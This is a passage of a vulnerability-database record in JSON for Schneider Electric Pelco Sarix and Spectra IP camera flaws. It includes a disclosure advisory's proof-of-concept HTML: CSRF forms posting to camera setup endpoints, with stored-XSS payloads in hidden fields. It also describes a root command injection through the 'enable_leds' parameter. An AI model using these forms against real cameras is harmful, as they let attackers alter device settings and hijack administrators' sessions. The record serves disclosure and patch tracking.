parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7825"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7825",
"trust": 3.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16261",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"id": "VAR-201905-1049",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
}
],
"trust": 2.3
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
}
]
},
"last_update_date": "2025-01-30T22:13:14.470000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
},
{
"title": "SchneiderElectric1stGenPelcoSarixEnhancedCamera command to inject vulnerability patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/162753"
},
{
"title": "Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92889"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7825"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7825"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-911"
},
{
"date": "2019-05-22T20:29:01.183000",
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-911"
},
{
"date": "2024-11-21T04:12:48.003000",
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Command Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
],
"trust": 0.6
}
}
VAR-201905-1050
Vulnerability from variot - Updated: 2025-01-30 22:06A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1050",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
